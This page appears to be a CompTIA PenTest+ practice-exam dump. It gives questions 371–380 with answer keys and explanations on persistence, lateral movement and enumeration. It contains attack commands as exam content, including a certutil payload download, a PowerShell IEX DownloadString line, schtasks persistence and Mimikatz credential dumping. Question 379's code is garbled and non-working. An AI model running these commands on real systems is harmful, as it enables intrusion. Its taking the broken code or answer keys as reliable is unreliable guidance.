CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 371:

  Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

  A. Remove the persistence mechanisms.
  B. Spin down the infrastructure.
  C. Preserve artifacts.
  D. Perform secure data destruction.
  D. Perform secure data destruction.

• Question 372:

  After a recent penetration test was conducted by the company's penetration testing team, a systems administrator notices the following in the logs:

  2/10/2023 05:50AM C:\users\mgranite\schtasks /query

  2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

  Which of the following best explains the team's objective?

  A. To enumerate current users
  B. To determine the users' permissions
  C. To view scheduled processes
  D. To create persistence in the network
  D. To create persistence in the network

  ---

  Explanation

  The logs indicate that the penetration testing team's objective was to create persistence in the network.

  Log Analysis:

  schtasks /query: This command lists all the scheduled tasks on the system. It is often used to understand what tasks are currently scheduled and running.

  schtasks /CREATE /SC DAILY: This command creates a new scheduled task that runs daily. Creating such a task can be used to ensure that a script or program runs regularly, maintaining a foothold in the system.

  Persistence:

  Definition: Persistence refers to techniques used to maintain access to a compromised system even after reboots or other interruptions.

  Scheduled Tasks: One common method of achieving persistence on Windows systems is by creating scheduled tasks that execute malicious payloads or scripts at regular intervals.

  Other Options:

  Enumerate Current Users: The logs do not show commands related to user enumeration.

  Determine Users' Permissions: Commands like whoami or net user would be more relevant for checking user permissions.

  View Scheduled Processes: While schtasks /query can view scheduled tasks, the addition of the schtasks / CREATE command indicates the intent to create new scheduled tasks, which aligns with creating persistence.

  References:

  Post-Exploitation: Establishing persistence is a key objective after gaining initial access to ensure continued access.

  Scheduled Tasks: Utilizing Windows Task Scheduler to run scripts or programs automatically at specified times as a method for maintaining access.

  By creating scheduled tasks, the penetration testing team aims to establish persistence, ensuring they can retain access to the system over time.

• Question 373:

  During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an Active Directory (AD) local domain.

  The tester's main goal is to leverage credentials to authenticate into other systems within the Active Directory environment.

  Which of the following steps should the tester take to complete the goal?

  A. Use Mimikatz to collect information about the accounts and try to authenticate in other systems
  B. Use Hashcat to crack a password for the local user on the compromised endpoint
  C. Use Evil-WinRM to access other systems in the network within the endpoint credentials
  D. Use Metasploit to create and execute a payload and try to upload the payload into other systems
  A. Use Mimikatz to collect information about the accounts and try to authenticate in other systems

  ---

  Explanation

  Since the tester has compromised a Windows machine and bypassed security, the best next step is to extract credentials from memory to move laterally within Active Directory.

  Option A (Mimikatz): Correct.

  Mimikatz extracts hashed credentials, plaintext passwords, and Kerberos tickets from memory.

  Attackers use Pass-the-Hash (PtH) or Pass-the-Ticket (PtT) to authenticate on other systems without cracking passwords.

  Option B (Hashcat): Cracking passwords takes time and is not necessary if Mimikatz provides reusable credentials.

  Option C (Evil-WinRM): Evil-WinRM is useful for remotely executing commands, but without valid credentials, it won't work.

  Option D (Metasploit): Metasploit payloads may be useful for initial exploitation, but credential dumping is a better next step.

  References:

  CompTIA PenTest+ PT0-003 Official Guide ?Credential Dumping&

  Lateral Movement

• Question 374:

  During reconnaissance, a penetration tester identifies that the target organization exposes a GitLab instance to the Internet. Anonymous browsing reveals project commit history that contains hardcoded API keys.

  Which technique did the tester MOST likely use?

  A. Directory fuzzing
  B. Public repository enumeration
  C. Local file inclusion
  D. DNS zone transfer
  B. Public repository enumeration

  ---

  Explanation

  The tester accessed publicly exposed Git repositories and examined commit histories. This aligns with public repository enumeration, a common OSINT technique for secret discovery.

  Why not others:

  Option A - Directory fuzzing brute-forces web paths and is unnecessary when the repo is public.

  Option C - LFI is an exploit, not OSINT.

  Option D - DNS zone transfer is unrelated to repository exposure.

  PT0-003 Mapping: Domain 2 - OSINT for discovering leaked credentials.

• Question 375:

  A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools.

  Which of the following should the consultant engage first?

  A. Service discovery
  B. OS fingerprinting
  C. Host discovery
  D. DNS enumeration
  C. Host discovery

  ---

  Explanation

  In network penetration testing, the initial steps involve gathering information to build an understanding of the network's structure, devices, and potential entry points. The process generally follows a structured approach, starting from broad discovery methods to more specific identification techniques. Here's a comprehensive breakdown of the steps:

  Host Discovery (Answer: C):

  Objective: Identify live hosts on the network.

  Tools & Techniques:

  Ping Sweep: Using tools like nmap with the -sn option (ping scan) to check for live hosts by sending ICMP

  Echo requests.

  ARP Scan: Useful in local networks, arp-scan can help identify all devices on the local subnet by broadcasting ARP requests.

  nmap -sn 192.168.1.0/24 References:

  The GoBox HTB write-up emphasizes the importance of identifying hosts before moving to service enumeration.

  The Forge HTB write-up also highlights using Nmap for initial host discovery in its enumeration phase.

  Service Discovery (Option A):

  Objective: After identifying live hosts, determine the services running on them.

  Tools & Techniques:

  Nmap: Often used with options like -sV for version detection to identify services.

  nmap -sV 192.168.1.100 References:

  As seen in multiple write-ups (e.g., Anubis HTB and Bolt HTB), service discovery follows host identification to understand the services available for potential exploitation.

  OS Fingerprinting (Option B):

  Objective: Determine the operating system of the identified hosts.

  Tools & Techniques:

  Nmap: With the -O option for OS detection.

  nmap -O 192.168.1.100 References:

  Accurate OS fingerprinting helps tailor subsequent attacks and is often performed after host and service discovery, as highlighted in the write-ups.

  DNS Enumeration (Option D):

  Objective: Identify DNS records and gather subdomains related to the target domain.

  Tools & Techniques:

  dnsenum, dnsrecon, and dig.

  dnsenum example.com References:

  DNS enumeration is crucial for identifying additional attack surfaces, such as subdomains and related services. This step is typically part of the reconnaissance phase but follows host discovery and sometimes service identification.

  Conclusion: The initial engagement in a network penetration test is to identify the live hosts on the network (Host Discovery). This foundational step allows the penetration tester to map out active devices before delving into more specific enumeration tasks like service discovery, OS fingerprinting, and DNS enumeration. This structured approach ensures that the tester maximizes their understanding of the network environment efficiently and systematically.

• Question 376:

  A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.

  Which of the following should the tester verify FIRST to assess this risk?

  A. Whether sensitive client data is publicly accessible
  B. Whether the connection between the cloud and the client is secure
  C. Whether the client's employees are trained properly to use the platform
  D. Whether the cloud applications were developed using a secure SDLC
  A. Whether sensitive client data is publicly accessible

• Question 377:

  A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access.

  Which of the following commands should the penetration tester use?

  A. powershell.exe impo C:\tools\foo.ps1
  B. certutil.exe -f https://192.168.0.1/foo.exebad.exe
  C. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
  D. rundll32.exe c:\path\foo.dll,functName
  B. certutil.exe -f https://192.168.0.1/foo.exebad.exe

  ---

  Explanation

  To execute a payload and gain additional access, the penetration tester should use certutil.exe. Here's why:

  Using certutil.exe:

  Purpose: certutil.exe is a built-in Windows utility that can be used to download files from a remote server, making it useful for fetching and executing payloads.

  Command: certutil.exe -f

  https://192.168.0.1/foo.exebad.exe

  downloads the file foo.exe from the specifiedURLandsavesitasbad.exe.ComparisonwithOtherCommands:

  powershell.exe impo C:\tools\foo.ps1 (A): Incorrect syntax and not as direct as using certutil for downloading files.

  powershell.exe -noni -encode IEX.Downloadstring("

  http://172.16.0.1/

  ") (C): Incorrect syntax fordownloadingandexecutingascript.

  rundll32.exe c:\path\foo.dll,functName (D): Used for executing DLLs, not suitable for downloading a payload.

  Using certutil.exe to download and execute a payload is a common and effective method.

• Question 378:

  A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster.

  Which of the following tools should the tester use to evaluate the cluster?

  A. Trivy
  B. Nessus
  C. Grype
  D. Kube-hunter
  D. Kube-hunter

  ---

  Explanation

  Evaluating a container orchestration cluster, such as Kubernetes, requires specialized tools designed to assess the security and configuration of container environments. Here's an analysis of each tool and why Kube-hunter is the best choice:

  Trivy (Option A): Trivy is a vulnerability scanner for container images and filesystem.

  Capabilities: While effective at scanning container images for vulnerabilities, it is not specifically designed to assess the security of a container orchestration cluster itself.

  Nessus (Option B): Nessus is a general-purpose vulnerability scanner that can assess network devices, operating systems, and applications.

  Capabilities: It is not tailored for container orchestration environments and may miss specific issues related to Kubernetes or other orchestration systems.

  Grype (Option C): Grype is a vulnerability scanner for container images.

  Capabilities: Similar to Trivy, it focuses on identifying vulnerabilities in container images rather than assessing the overall security posture of a container orchestration cluster.

  Kube-hunter (Answer: D): Kube-hunter is a tool specifically designed to hunt for security vulnerabilities in Kubernetes clusters.

  Capabilities: It scans the Kubernetes cluster for a wide range of security issues, including misconfigurations and vulnerabilities specific to Kubernetes environments.

  References:

  Kube-hunter is recognized for its effectiveness in identifying Kubernetes-specific security issues and is widely used in security assessments of container orchestration clusters.

  Conclusion: Kube-hunter is the most appropriate tool for evaluating a container orchestration cluster, such as Kubernetes, due to its specialized focus on identifying security vulnerabilities and misconfigurations specific to such environments.

• Question 379:

  SIMULATION

  Using the output, identify potential attack vectors that should be further investigated.

  

  

  

  A. See explanation below.
  B. PlaceHolder
  C. PlaceHolder
  D. PlaceHolder
  A. See explanation below.

  ---

  Explanation

  1: Null session enumeration

  Weak SMB file permissions

  Fragmentation attack

  2: nmap

  -sV

  -p 1-1023

  192.168.2.2

  3: #!/usr/bin/python

  export $PORTS = 21,22

  for $PORT in $PORTS:

  try:

  s.connect((ip, port))

  print("%s:%s ?OPEN" % (ip, port))

  except socket.timeout

  print("%:%s ?TIMEOUT" % (ip, port))

  except socket.error as e:

  print("%:%s ?CLOSED" % (ip, port))

  finally

  s.close()

  port_scan(sys.argv[1], ports)

• Question 380:

  A penetration tester successfully gains access to a Linux system and then uses the following command:

  find / -type f -ls > /tmp/recon.txt

  Which of the following best describes the tester's goal?

  A. Permission enumeration
  B. Secrets enumeration
  C. User enumeration
  D. Service enumeration
  A. Permission enumeration

  ---

  Explanation

  The find command shown here recursively searches the entire filesystem (/) for files (-type f) and lists them with detailed information (-ls), including file ownership, group, size, and permissions. The results are then redirected into /tmp/ recon.txt.

  This is typically performed as part of post-exploitation local enumeration to gather information on:

  Files and their permission settings.

  Potential world-writable or sensitive files (e.g., /etc/shadow, SSH keys, config files).

  Misconfigurations that could lead to privilege escalation.

  Thus, the tester's main objective is permission enumeration -- identifying files and directories with insecure permissions that could be exploited.

  Why not the others:

  Option B: Secrets enumeration: While secrets might later be found in files, the command's intent is general permission/file listing, not targeted secret extraction.

  Option C: User enumeration: The command doesn't list users or accounts (no /etc/passwd or who queries).

  Option D: Service enumeration: This doesn't inspect running services or open ports.

  CompTIA PT0-003 Objective Mapping:

  Domain 2.0: Information Gathering and Vulnerability Scanning 2.5: Perform local enumeration on compromised hosts (e.g., file and permission enumeration).